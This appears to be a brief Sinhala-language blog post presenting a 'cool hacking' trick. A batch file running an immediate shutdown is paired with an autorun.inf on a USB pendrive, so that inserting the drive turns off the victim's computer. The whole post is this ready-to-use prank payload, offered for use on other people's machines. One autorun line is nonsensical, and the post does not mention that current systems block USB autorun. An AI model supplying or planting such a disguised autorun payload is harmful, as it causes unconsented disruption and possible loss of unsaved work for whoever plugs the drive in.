turn off computer using pendrive(cool hacking)



කරන්න තියෙන්නේ මුලින්ම Notepad file එකක් හදාගන්න එකේ පහල තියෙන Code එක Type කරන්න 

@echo off
shutdown -s -t 00


හරි දැන් ඕක save කරගන්න..මතක ඇතුව save කරද්දී නමට hack.bat දෙන්න 

අයෙත් Notepad එකක් හදාගන්න එකේ පහල තියෙන code එක type කරන්න 

[autorun]
Open=hack.bat
Action=Mouse Disable

මතක ඇතුව ඕක save කරද්දී නමට autorun.inf‘ දෙන්න :)

දැන් ඔය File දෙක Pen එකට් copy කරන්න එතකොට වැඩේ හරි පෙන් එක ගහපු ගමන් Pc එක Off 
Previous
Next Post »